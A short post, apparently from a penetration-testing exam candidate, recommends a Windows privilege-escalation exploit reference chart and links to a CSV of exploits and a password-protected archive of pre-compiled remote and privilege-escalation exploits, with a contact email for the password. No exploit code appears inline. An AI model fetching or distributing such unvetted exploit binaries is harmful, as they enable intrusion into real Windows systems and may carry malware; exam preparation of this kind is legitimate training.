Those  who have not enough lab time to compile their windows exploit, I will  recommend you to download and compile the Mike Czumak  Windows pre-compiled reference chart. I compiled it using Visual Studio  and GNU Code-blocks, really it will very useful at the time of exam.

I uploaded those pre-compiled exploits in mediafire with password protected, but i discourage that  becoz exploit compilation is one of the exercise in the course so you have to do it your own. if anyone need that mail me at sathisharthar@gmail.com  (Note: don’t try to bruteforce it, its more than  20 words)

http://www.securitysift.com/download/MS_privesc_and_exploits_table.csv

Windows  Tools, Scripts and Pre-Compiled Exploit for Remote and Priviledge Escalation:

http://download1582.mediafire.com/atk42ybutgcg/wqnw5c3ljgudqiv/windows.zip